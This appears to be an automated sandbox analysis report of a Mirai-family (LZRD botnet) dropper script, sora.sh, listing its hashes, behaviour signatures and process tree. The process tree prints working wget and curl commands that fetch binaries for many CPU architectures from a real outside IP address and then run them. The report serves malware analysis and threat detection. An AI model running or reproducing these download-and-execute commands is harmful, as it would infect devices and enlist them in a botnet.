Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    29-08-2024 20:19

General

  • Target

    sora.sh

  • Size

    1KB

  • MD5

    4bad6b7a8f3a112f1e8a64415b2c5e57

  • SHA1

    80386ebec3b511cd2a07da88e300a62590b8d889

  • SHA256

    4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77

  • SHA512

    da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (19828) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads runtime system information 28 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sora.sh
    /tmp/sora.sh
    1⤵
    • Writes file to tmp directory
    PID:715
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.x86
      2⤵
      • Writes file to tmp directory
      PID:717
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:729
    • /bin/cat
      cat sora.x86
      2⤵
      PID:742
    • /bin/chmod
      chmod +x robben sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:743
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:744
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.mips
      2⤵
      • Writes file to tmp directory
      PID:747
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.mips
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:749
    • /bin/cat
      cat sora.mips
      2⤵
      PID:750
    • /bin/chmod
      chmod +x robben sora.mips sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:751
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Reads runtime system information
      PID:752
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.mpsl
      2⤵
      • Writes file to tmp directory
      PID:759
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:760
    • /bin/cat
      cat sora.mpsl
      2⤵
      PID:761
    • /bin/chmod
      chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:762
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:763
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm4
      2⤵
      PID:765
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:766
    • /bin/cat
      cat sora.arm4
      2⤵
      PID:771
    • /bin/chmod
      chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:772
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:774
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm5
      2⤵
      • Writes file to tmp directory
      PID:776
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:784
    • /bin/cat
      cat sora.arm5
      2⤵
      PID:793
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:794
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:796
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm6
      2⤵
      • Writes file to tmp directory
      PID:798
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:807
    • /bin/cat
      cat sora.arm6
      2⤵
      PID:821
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:822
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:823
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.arm7
      2⤵
      • Writes file to tmp directory
      PID:826
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:828
    • /bin/cat
      cat sora.arm7
      2⤵
      PID:829
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:830
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:831
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.ppc
      2⤵
      • Writes file to tmp directory
      PID:833
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.ppc
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:834
    • /bin/cat
      cat sora.ppc
      2⤵
      PID:846
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:847
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:849
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.m68k
      2⤵
      • Writes file to tmp directory
      PID:852
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.m68k
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:860
    • /bin/cat
      cat sora.m68k
      2⤵
      PID:871
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:872
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:873
    • /usr/bin/wget
      wget http://154.216.17.67/bins/sora.sh4
      2⤵
      • Writes file to tmp directory
      PID:875
    • /usr/bin/curl
      curl -O http://154.216.17.67/bins/sora.sh4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:876
    • /bin/cat
      cat sora.sh4
      2⤵
      PID:877
    • /bin/chmod
      chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 systemd-private-6e072cc57e184476829cf03042a24b9e-systemd-timedated.service-low75k
      2⤵
      PID:878
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:879

Downloads

  • /tmp/robben

    Filesize

    30KB

    MD5

    bcff8f405bdd93b8488e6f6aca117a32

    SHA1

    8b32a1dea70be2c76830e3808f70ad62eb3b1250

    SHA256

    67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396

    SHA512

    5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a

  • /tmp/robben

    Filesize

    31KB

    MD5

    131fc41fbe66493277e3155f50b9fce5

    SHA1

    0bbb17cb882e34dc82e51862f8245f3187664beb

    SHA256

    d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f

    SHA512

    de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247

  • /tmp/robben

    Filesize

    33KB

    MD5

    8652e70ebc913d0078f59b2526a40d36

    SHA1

    1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4

    SHA256

    cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf

    SHA512

    ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3

  • /tmp/robben

    Filesize

    212B

    MD5

    45e588171939a0780c48755918b1cd74

    SHA1

    6c33e64b1a43fb6752026fd1254cac740e7c3243

    SHA256

    770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535

    SHA512

    fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770

  • /tmp/robben

    Filesize

    27KB

    MD5

    00d6529558e66184baaf1b0f21e59739

    SHA1

    3b9db5227c48f501573ea9b626c5c765a17e7c61

    SHA256

    fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d

    SHA512

    49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb

  • /tmp/robben

    Filesize

    71KB

    MD5

    a0b83eba33da68f09402235338d316a8

    SHA1

    15f3e890997e3b7f21c16eb1b0462bdf4ed11d61

    SHA256

    eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507

    SHA512

    2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79